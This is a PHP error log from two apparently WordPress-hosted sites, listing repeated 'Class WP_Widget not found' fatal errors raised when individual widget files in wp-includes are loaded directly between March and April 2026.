[20-Mar-2026 04:09:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[20-Mar-2026 04:22:29 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[20-Mar-2026 04:56:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[20-Mar-2026 05:08:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[20-Mar-2026 05:37:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[20-Mar-2026 06:25:54 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[20-Mar-2026 09:38:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[28-Mar-2026 16:18:41 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-block.php on line 17
[30-Mar-2026 15:56:48 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-text.php on line 17
[30-Mar-2026 15:58:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-rss.php on line 17
[31-Mar-2026 02:31:56 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[31-Mar-2026 04:32:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[31-Mar-2026 07:34:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-meta.php on line 19
[31-Mar-2026 10:50:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[31-Mar-2026 10:53:00 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[31-Mar-2026 10:55:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[31-Mar-2026 12:49:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-pages.php on line 17
[01-Apr-2026 16:16:29 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-links.php on line 17
[01-Apr-2026 16:19:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-categories.php on line 17
[01-Apr-2026 20:30:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[01-Apr-2026 20:33:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-links.php on line 17
[01-Apr-2026 20:35:41 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-categories.php on line 17
[02-Apr-2026 06:23:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-pages.php on line 17
[02-Apr-2026 06:25:05 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-meta.php on line 19
[02-Apr-2026 06:27:05 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media.php on line 17
[02-Apr-2026 06:29:06 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-rss.php on line 17
[02-Apr-2026 07:39:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-categories.php on line 17
[02-Apr-2026 07:41:37 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[02-Apr-2026 07:43:37 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-text.php on line 17
[02-Apr-2026 07:45:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-links.php on line 17
[02-Apr-2026 08:35:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[02-Apr-2026 08:38:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[02-Apr-2026 09:32:05 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[02-Apr-2026 09:34:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[02-Apr-2026 09:36:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[02-Apr-2026 09:40:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[02-Apr-2026 09:42:48 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[02-Apr-2026 09:44:49 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[02-Apr-2026 09:47:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[02-Apr-2026 20:14:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[03-Apr-2026 10:59:57 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-archives.php on line 17
[03-Apr-2026 21:17:34 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media.php on line 17
[05-Apr-2026 02:10:34 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-text.php on line 17
[05-Apr-2026 08:45:57 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[05-Apr-2026 13:49:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-pages.php on line 17
[05-Apr-2026 15:05:36 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-meta.php on line 19
[06-Apr-2026 18:46:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-rss.php on line 17
[06-Apr-2026 20:44:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-search.php on line 17
[06-Apr-2026 20:46:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-block.php on line 17
[06-Apr-2026 20:48:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-archives.php on line 17
[07-Apr-2026 03:47:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[07-Apr-2026 22:18:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-links.php on line 17
[08-Apr-2026 00:58:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[08-Apr-2026 01:44:16 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[08-Apr-2026 05:32:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[08-Apr-2026 09:11:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[09-Apr-2026 18:08:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-categories.php on line 17
[10-Apr-2026 07:51:39 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media.php on line 17
[10-Apr-2026 23:17:18 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-pages.php on line 17
[11-Apr-2026 04:59:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-meta.php on line 19
[11-Apr-2026 06:07:27 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-text.php on line 17
[11-Apr-2026 14:05:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[11-Apr-2026 21:04:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[12-Apr-2026 02:35:39 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[12-Apr-2026 05:29:34 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[12-Apr-2026 06:11:58 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[12-Apr-2026 06:22:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[12-Apr-2026 06:34:27 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[12-Apr-2026 08:13:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[12-Apr-2026 08:16:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[12-Apr-2026 10:36:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-categories.php on line 17
[12-Apr-2026 11:31:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[12-Apr-2026 13:02:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-block.php on line 17
[12-Apr-2026 13:32:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-archives.php on line 17
[12-Apr-2026 13:36:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-rss.php on line 17
[12-Apr-2026 13:37:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[12-Apr-2026 14:16:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-search.php on line 17
[12-Apr-2026 14:55:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[12-Apr-2026 16:36:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-meta.php on line 19
[12-Apr-2026 17:13:27 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-text.php on line 17
[12-Apr-2026 18:39:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[12-Apr-2026 22:14:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media.php on line 17
[13-Apr-2026 00:37:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-pages.php on line 17
[13-Apr-2026 01:18:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-links.php on line 17
[13-Apr-2026 09:25:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[13-Apr-2026 16:05:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[13-Apr-2026 17:55:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[14-Apr-2026 10:25:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-links.php on line 17
[15-Apr-2026 15:19:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[15-Apr-2026 19:26:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-categories.php on line 17
[18-Apr-2026 22:20:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-meta.php on line 19
[19-Apr-2026 00:31:27 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[19-Apr-2026 11:18:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
